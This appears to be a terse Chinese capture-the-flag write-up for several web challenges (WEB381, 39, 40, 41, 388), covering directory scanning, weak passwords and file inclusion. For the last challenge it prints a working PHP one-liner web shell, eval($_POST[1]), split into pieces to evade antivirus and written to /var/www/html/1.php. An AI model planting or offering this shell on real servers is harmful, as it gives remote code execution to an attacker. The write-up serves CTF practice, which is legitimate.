WEB381
payload
后台目录扫描发现page.php,什么,没有扫到,那就自己添加到扫描器的字典里吧。
page.php?id=flag
WEB39
这里爆出了路径,直接访问获取flag。
web40
这里和上一题一样,但是多了一个弱密码.
web41
web 388
扫描目录发现这里有个debug,这里盲猜是file传参数,尝试包含一下包含一下文件
接着在扫描目录得地方还找到了alsckdfy/editor/
这里上传成功之后会有路径,这里最好上传一句话免杀马
<?php
$a = '<?ph'.'p ev'.'al($_PO'.'ST[1]);?>';
file_put_contents('/var/www/html/1.php',$a);
?>
然后执行一句话木马
接着访问1.php
直接tac